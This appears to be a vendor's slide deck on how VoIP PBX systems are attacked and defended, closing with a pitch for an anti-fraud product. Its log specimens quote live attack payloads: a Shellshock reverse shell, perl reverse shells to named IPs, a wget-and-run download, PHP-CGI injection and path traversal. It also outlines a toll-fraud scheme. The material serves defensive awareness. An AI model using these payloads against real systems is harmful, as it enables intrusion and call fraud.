Date post: | 14-Jul-2015 |
Category: |
Presentations & Public Speaking |
Upload: | flavio-goncalves |
View: | 493 times |
Download: | 3 times |
About meFlavio E. Goncalves
CTO of SipPulse (www.sippulse.com)
Turnkey solutions for VoIP providers and Telcos.
Anti-Fraud Solutions
Why they are doing?
#1 Allocate a number and a recording in a PRN provider
#2 Find a vulnerable deviceUsing shodan
#3 Make callsand cash your money
Distribution by country
117636
105603
78656
32795
11910 11120 10702 3736 2836 1978
US FR DE PS RU TW SC SG GB CA
TOP 5 PBX Exploits in September/October
1. Shellshock
2. PHP/LAMP Injection
3. SQL injection in Trixbox
4. Linksys remote code execution
5. FreePBX Remote Code Execution
#1 Shellshock
• Exploit Date: 09/2014
Specimen:
• [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
• [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"
#2 SQL injection in Trixbox
• Exploit Date: 03/2014 - http://www.exploit-db.com/exploits/32239/
Specimen:
• [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"
#3 Linksys Remote Code Execution
• Exploit Date: 02/2014 - http://www.exploit-db.com/exploits/31683/
Specimen:
• [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"
#4 LAMP Attacks• Apache/PHP Remote Exploit
• Exploit date 10/2013
• Especimen:
• POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
• [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“
#5 CallMeNum (Demo)
• Exploit date: 03/2012
• Specimen:
• GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes/n
• Application: system
• Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,“x.y.z.w:4446"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\ncmp\n"); system$_ while<>;'
Unknown Exploits
• Jul/2014
• Specimen:[03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php[03/Jul/2014] "GET /fuxkkk.php[03/Jul/2014] "GET /recordings/theme/alexpass.php
How hackers are getting into your PBX
• #1 – Sip Brute Force (Fail2ban is effective)
• #2 – Http Exploitation
• #3 – Attacks to phones
• #4 – Caller ID Spoofing
• #5 – Billing/Credit card frauds
Part – III How to defend
#1 Patching Everything and Upgrade frequently
#2 Use a Firewall
#3 Use a Session Border Controller
#4 Use Encryption
#5 Use an Anti-Fraud System
#2 Use a Firewall or configure properly IP tables
•Effectiveness: High
•Risk: Medium
•Cost: Low
•Absolutely a must do. At least, no Internet access to SSH, no Internet access to HTTP/HTTPS.
•No prevention for phones attacks
#4 Use encryption
•Effectiveness: Medium
•Risk: Medium
•Cost: High if you intend to do mutual authentication
#5 Use an AntiFraud System
• Effectiveness: High
• Risk: Very Low
• Cost: Medium
• Comments: Can detect 99.999% of the attacks, It prevents against caller ID spoofing, Social Engineering and Phone Attacks.
• Limitations: Firewall restrictions are required to avoid tampering the anti-fraud rules.
Working Together in 2 steps
1. Make sure your customer’s firewall and fail2ban is configured right (You)
2. Partner with us to use TFPS on your customers (Us)
How effective it is an Anti-Fraud Solution
•99.989% just by protocol signature.
•Number obtained comparing the attacks registered on the honeypot against rules.
Anti-Fraud Effectiveness
Detected Undetected
1. 99.89% of the attacks prevented by signature detection
2. Collaborative protection. One PBX hacked automatically blocks the IP for the others
3. Mechanism, SIP Redirect•No additional hardware required.
•Available for OpenSIPS/Freeswitch/Asterisk
www.tfps.co || tfps.sippulse.com
Asterisk Code[from-internal] ; Set there the context for your users;FPS for International Callsexten=_011[1-9].,1,set(ip=${CHANNEL(recvip)})same=>n,SIPAddHeader(P-Received: ${ip})same=>n,set(ua=${CHANNEL(useragent)})same=>n,SIPAddHeader(P-UA: ${ua})same=>n,set(GROUP()=fps)same=>n,set(ncalls=${GROUP_COUNT(fps)})same=>n,SIPAddHeader(P-Calls: ${ncalls})same=>n,set(_original=${EXTEN})same=>n,dial(SIP/fps/${EXTEN:2})
Asterisk Code[fps];For calls not approvedexten=_R.,1,Answer()same=>n,playback(unauthorized); (Customize here to generate an error message)same=>n,hangup(21);For calls approvedexten=_A.,1,Answer()same=>n,Dial(SIP/provider/${original});(Customize here to send the call ahead)same=>n,hangup(16)
Comparing to other anti-fraud solutions!
• Pluggable
• No Additional Hardware
• Small traffic to be analyzed
• Small risk, only a few calls can be affected.
• Easy handling of outages
Thank You!
• e-mail: [email protected]
• skype: flaviogoncalves1
• Twitter: @asteriskguide
• blog.tfps.co
#6 FreePBX 2.x Code Execution
• Specimen:
• [03/Jul/2014:17:28:41 +0000] "GET
• /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"
#4 VTIGER Exploit (Lots of variations)
• 0001189: Vtiger CRM - php inject vulnerability
• Specimen
• 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-“
• 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 537 "-" "-"
#4 PHP Code Injection Vulnerability
• Specimen:
• [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2293.170.130.201%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-“
• "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\nunk\n"); system$_ while<>;'
#9 FreePBX Extension Dump Exploitation
• Specimen:
• 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC¤t_page=0/admin/cdr/call-comp.php HTTP/1.1" 404 484 "-" "-"
#6 Freeswitch Attacks
GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-df&template=linksys
#4 Caller ID Spoofing
• 1 - Send 1 million calls and cancel
• 2 - Fake the callerID to a PRN
• 3 - Wait for the call back.
Open Source is a Target!
•We are seeing scans for:
• Vicidial
• Astpp
• phpMyAdmin (hot)
• Tomcat
• Jboss
• FreeSwitch
First way to protect
1.Make sure your system is protected by a firewall1. Vulnerability SCAN
2. Apply firewall rules to prevent unauthorized access to the server
3. Use .htaccess and implement dual authentication
# 5 SIP Phone Recent Vulnerabilities
• Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10)
• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-3313/ (4.3)
• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-3312/ (6.9)
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3427
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/